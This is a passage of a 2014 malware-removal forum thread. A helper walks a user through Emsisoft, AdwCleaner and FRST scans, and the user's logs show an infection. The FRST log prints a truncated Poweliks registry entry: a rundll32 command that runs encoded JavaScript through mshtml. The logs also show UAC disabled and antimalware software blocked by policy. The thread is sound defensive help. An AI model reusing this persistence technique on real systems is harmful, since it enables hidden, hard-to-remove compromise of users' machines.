[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"="c:\program files\CCleaner\CCleaner.exe" [2014-10-23 4825880]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-10-13 37152]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2009-09-24 141848]
"Persistence"="c:\windows\system32\igfxpers.exe" [2009-09-24 150552]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 974432]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2014-05-07 256896]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 0 (0x0)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableVirtualization"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * 
.
[HKLM\~\startupfolder\C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk]
path=c:\users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
backup=c:\windows\pss\Dropbox.lnk.Startup
backupExtension=.Startup
.
[HKLM\~\startupfolder\C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet 1510 series.lnk]
path=c:\users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Deskjet 1510 series.lnk
backup=c:\windows\pss\Monitor Ink Alerts - HP Deskjet 1510 series.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpUninstallCleanUp]
REG delete HKEY_LOCAL_MACHINE\Software\SearchProtect [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2014-05-08 13:48 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds]
2009-09-24 00:30 173592 ----a-w- c:\windows\System32\hkcmd.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2013-05-30 19:50 96056 ----a-w- c:\program files\HP\HP Software Update\hpwuschd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skgrfuuzzc]
2014-10-31 01:59 272896 ----a-w- c:\users\Jack\AppData\Local\Programs\Skgrfuuzzc.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMAXPnP]
2009-08-03 21:00 1314816 ----a-w- c:\program files\Analog Devices\Core\smax4pnp.exe
.
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-10-25 108032]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys [2014-07-17 95920]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe [2014-08-22 288120]
S1 GUBootStartup;GUBootStartup;c:\windows\System32\drivers\GUBootStartup.sys [2014-10-25 17344]
S2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;c:\program files\Hp\Common\HPSupportSolutionsFrameworkService.exe [2014-02-05 47416]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MPKSL4D4A1AF2
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-11 02:27 1091912 ----a-w- c:\program files\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-11-08 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-26 21:40]
.
2014-10-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-10-13 05:32]
.
2014-07-02 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-25 16:54]
.
2014-07-02 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-25 16:54]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://xfinity.comcast.net/
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
.
- - - - ORPHANS REMOVED - - - -
.
MSConfigStartUp-BManager - c:\program files\Browser Features\BManager.exe
MSConfigStartUp-Browser Features - c:\program files\Browser Features\BManager.exe
MSConfigStartUp-MSMPENG - c:\users\Jack\AppData\Roaming\svc-umwl.exe
MSConfigStartUp-Windows X64 Service Manager - c:\program files\FlashNow Updater\flsysio.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-11-08  16:26:46
ComboFix-quarantined-files.txt  2014-11-08 21:26
.
Pre-Run: 703,285,739,520 bytes free
Post-Run: 715,552,100,352 bytes free
.
- - End Of File - - 4FFD38030584CA96EAADD4F066032702
2B04374FE0FC03CCB75040264CDC39BE


#10 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 08 November 2014 - 05:36 PM

Step 1

emsisoft_emergency_kit.pnglogo.png
  • Download EEK and extract the contents to C:\
  • Double-click the desktop-shortcut to start the tool.
  • Click in the following update-screen "Yes" to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Enable "PUPs" detection (1) and click on "Full Scan" (2).
  • If adware/malware was detected, make sure to check all the items and click "Quarantine selected" (1) and afterwards "view report" (2).
  • Please paste the content of the report in your next reply.
EKK.gif




Step 2

Please download adwcleaner.png AdwCleaner (by Xplode) and save it to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a log file (that is saved in C:\AdwCleaner[S#].txt) will open automatically.
    Copy and paste the contents of that logfile in your next reply.
Step 3


frst.pngfrstscan.png

Start FRST with administator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

Edited by deeprybka, 08 November 2014 - 05:38 PM.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#11 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 08 November 2014 - 09:08 PM

I have to attach the log. Apparently there are a lot of what appear to be emoticons in the log.

On to the AdwCleaner.

BTW, Security Essentials keeps finding things. I thought it was off, but something must have turned it back on?

Bobbie

Attached Files



#12 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 08 November 2014 - 09:41 PM

Unable to run AdwCleaner.

It says "waiting for action" after I click the Scan button.

 

There are a lot of iexplore.exe showing up in TaskManager - all saying the page can't be displayed.  But no IE icons show up on the screen, or on the TaskBar.

 

I'm going to reboot and try AdwCleaner again.

 

I'm beginning to think this computer needs reformatting  -  as much as I hate to have to do that.

 

Bobbie



#13 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:05:52 PM

Posted 09 November 2014 - 09:54 AM

Unable to run AdwCleaner.
It says "waiting for action" after I click the Scan button.

 
  • After the scan has finished, click on the Clean button.
:)

I'm beginning to think this computer needs reformatting


Relax buddy...Please try to run AdwCleaner...
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#14 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 09 November 2014 - 10:15 AM

It worked this morning.  Here is the AdwCleaner log.
I'll go to the FRST now.
I have the feeling you're like me - hate to reformat when so much is to be learned by getting the cleaning done.
There are still some COM Surrogate showing up in Task Manager, but not all of the iexplore.exe that were there yesterday.
Bobbie
 
 
 
 
# AdwCleaner v4.100 - Report created 09/11/2014 at 10:08:26
# DB v2014-11-07.1
# Updated 08/11/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)
# Username : Jack - JACK-PC
# Running from : C:\Users\Jack\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\chrome\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\components\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\defaults\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\locale\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\skin\user.js
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKCU\Software\UpdateFiles
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17344
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v35.0.1916.153
 
 
*************************
 
AdwCleaner[R0].txt - [293 octets] - [08/11/2014 21:12:42]
AdwCleaner[R1].txt - [293 octets] - [08/11/2014 21:19:56]
AdwCleaner[R2].txt - [1510 octets] - [09/11/2014 10:03:47]
AdwCleaner[S0].txt - [1440 octets] - [09/11/2014 10:08:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1500 octets] ##########


#15 Bobbie S.

Bobbie S.
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:11:52 AM

Posted 09 November 2014 - 10:17 AM

Here is the FRST.txt

I'll wait for the "fix" to be sent to me.

Thanks for all your patience.

Bobbie

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 09-11-2014
Ran by Jack (administrator) on JACK-PC on 09-11-2014 10:13:48
Running from C:\Users\Jack\Downloads
Loaded Profile: Jack (Available profiles: Jack)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Hewlett-Packard Company) C:\Program Files\HP\Common\HPSupportSolutionsFrameworkService.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Desktop.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
Winlogon\Notify\acillao: C:\Users\Jack\AppData\Local\acillao.dll ()
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4825880 2014-10-23] (Piriform Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-10-13] (Glarysoft Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [acillao] => rundll32 "C:\Users\Jack\AppData\Local\acillao.dll",acillao <===== ATTENTION
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BootExecute: autocheck autochk *  
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://xfinity.comcast.net/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xD81BF7C5FEE9CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Old Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKCU - {4AA1010B-C099-473B-B519-B51807026EBF} URL = http://search.yahoo.com/search?p={searchTerms}&b={startPage?}&fr=ie8
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-08]
CHR Extension: (Google Drive) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-08]
CHR Extension: (YouTube) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-08]
CHR Extension: (Google Search) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-08]
CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-08]
CHR Extension: (Gmail) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-08]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [47416 2014-02-05] (Hewlett-Packard Company)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cleanhlp; C:\EEK\bin\cleanhlp32.sys [50200 2014-11-08] (Emsisoft GmbH)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17344 2014-10-25] (Glarysoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
S3 catchme; \??\C:\Users\Jack\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-09 10:13 - 2014-11-09 10:13 - 00000000 ____D () C:\Users\Jack\Downloads\FRST-OlderVersion
2014-11-09 02:33 - 2014-11-09 02:33 - 00000000 ____D () C:\ProgramData\PawjIcin
2014-11-09 02:33 - 2014-11-09 02:33 - 00000000 ____D () C:\ProgramData\KatmaTtena
2014-11-08 21:14 - 2014-11-08 21:14 - 00000000 ____D () C:\ProgramData\NusepBarun
2014-11-08 21:14 - 2014-11-08 21:14 - 00000000 ____D () C:\ProgramData\NadeFyucj
2014-11-08 21:11 - 2014-11-09 10:08 - 00000000 ____D () C:\AdwCleaner
2014-11-08 21:09 - 2014-11-08 21:09 - 02145792 _____ () C:\Users\Jack\Desktop\AdwCleaner.exe
2014-11-08 20:56 - 2014-11-08 20:56 - 00000000 ____D () C:\ProgramData\WasaZritg
2014-11-08 20:56 - 2014-11-08 20:56 - 00000000 ____D () C:\ProgramData\BiguZwoy
2014-11-08 18:19 - 2014-11-08 18:19 - 00000750 _____ () C:\Users\Jack\Desktop\Start Emsisoft Emergency Kit.lnk
2014-11-08 18:18 - 2014-11-08 18:20 - 00000000 ____D () C:\EEK
2014-11-08 18:17 - 2014-11-08 18:18 - 155812376 _____ () C:\Users\Jack\Downloads\EmsisoftEmergencyKit.exe
2014-11-08 16:26 - 2014-11-08 16:26 - 00050867 _____ () C:\ComboFix.txt
2014-11-08 15:34 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-08 15:34 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-08 15:34 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-08 15:33 - 2014-11-08 16:27 - 00000000 ____D () C:\Qoobox
2014-11-08 15:33 - 2014-11-08 16:24 - 00000000 ____D () C:\Windows\erdnt
2014-11-08 15:31 - 2014-11-08 15:31 - 05593178 ____R (Swearware) C:\Users\Jack\Downloads\ComboFix.exe
2014-11-08 12:44 - 2014-11-08 12:45 - 00026570 _____ () C:\Users\Jack\Downloads\Addition.txt
2014-11-08 12:43 - 2014-11-09 10:13 - 00001407 _____ () C:\Users\Jack\Downloads\FRST.txt
2014-11-08 12:43 - 2014-11-08 12:44 - 00000000 ____D () C:\Users\Jack\Downloads\CLEANUP
2014-11-08 12:42 - 2014-11-09 10:13 - 01107456 _____ (Farbar) C:\Users\Jack\Downloads\FRST.exe
2014-11-08 12:42 - 2014-11-09 10:13 - 00000000 ____D () C:\FRST
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\UehaLwahi
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\NeseVdol
2014-11-07 01:50 - 2014-11-07 01:50 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\2E8A529B.sys
2014-11-05 16:37 - 2014-11-08 20:55 - 00000000 ____D () C:\ProgramData\VenqIxjeh
2014-11-05 16:36 - 2014-11-08 20:55 - 00000000 ____D () C:\ProgramData\KupoqIkavk
2014-11-05 02:34 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Ismyihci
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\LukucOkjav
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\CimhAyoj
2014-11-03 23:05 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Waanypi
2014-11-03 23:04 - 2014-11-03 23:04 - 00000000 ____D () C:\ProgramData\FunhEmnol
2014-11-03 23:03 - 2014-11-03 23:03 - 00000144 _____ () C:\Windows\system32\1
2014-11-03 23:03 - 2014-11-03 23:03 - 00000000 ____D () C:\ProgramData\ZixvOfbax
2014-11-01 22:16 - 2014-11-09 10:10 - 00000336 _____ () C:\Windows\setupact.log
2014-11-01 22:16 - 2014-11-09 10:09 - 00007030 _____ () C:\Windows\PFRO.log
2014-11-01 22:16 - 2014-11-01 22:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-11-01 21:08 - 2014-11-09 10:13 - 00191619 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 01:16 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\MuztOnba
2014-11-01 01:15 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\UabcIzedk
2014-10-31 22:46 - 2014-11-09 09:23 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-31 22:46 - 2014-11-09 09:22 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-31 22:45 - 2014-11-08 20:57 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FrameworkUpdate7
2014-10-31 22:45 - 2014-11-02 01:10 - 00000000 ____D () C:\b11f30c
2014-10-31 22:45 - 2014-10-31 22:45 - 00000448 ____H () C:\Users\Jack\AppData\Roaming\麽鎒駓覜
2014-10-30 21:12 - 2014-10-30 21:12 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 20:21 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Desktop\dds.com
2014-10-30 20:18 - 2014-10-30 20:25 - 00000770 _____ () C:\Users\Jack\Desktop\attach.txt
